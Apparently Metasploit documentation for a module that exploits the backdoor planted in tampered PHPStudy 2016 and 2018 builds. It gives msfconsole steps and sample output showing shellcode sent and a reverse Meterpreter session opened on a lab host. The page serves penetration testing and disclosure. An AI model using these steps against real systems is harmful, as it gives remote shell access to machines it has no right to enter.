31 lines
1.1 KiB
Markdown
31 lines
1.1 KiB
Markdown
|
## Description
|
||
|
|
|
||
|
|
PHPStudy is free software, it is a one-click installation software, which includes PHP, MySQL, Apache and more. At some point in time, hackers were able to hack into phpStudy and tamper on 2016 and 2018 versions of the software to make it vulnerable to this specific exploit.
|
||
|
|
|
||
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
The vulnerability exists in php-5.4.45 and php-5.2.17 service versions in PHPStudy2016 and PHPStudy2018
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. Start msfconsole
|
||
|
|
2. Do:```use exploit/multi/http/phpstudy_backdoor_rce```
|
||
|
|
3. Do:```set rhosts <target>```
|
||
|
|
4. Do:```run```
|
||
|
|
|
||
|
|
If your target is vulnerable, you will get a shell.
|
||
|
|
you should see an output similar to the following
|
||
|
|
|
||
|
|
```
|
||
|
|
msf5 exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104
|
||
|
|
rhosts => 192.168.56.104
|
||
|
|
msf5 exploit(multi/http/phpstudy_backdoor_rce) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||
|
|
[+] Sending shellcode
|
||
|
|
[*] Sending stage (38288 bytes) to 192.168.56.104
|
||
|
|
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:49169) at 2020-02-23 10:11:40 +0800
|
||
|
|
|
||
|
|
meterpreter >
|
||
|
|
```
|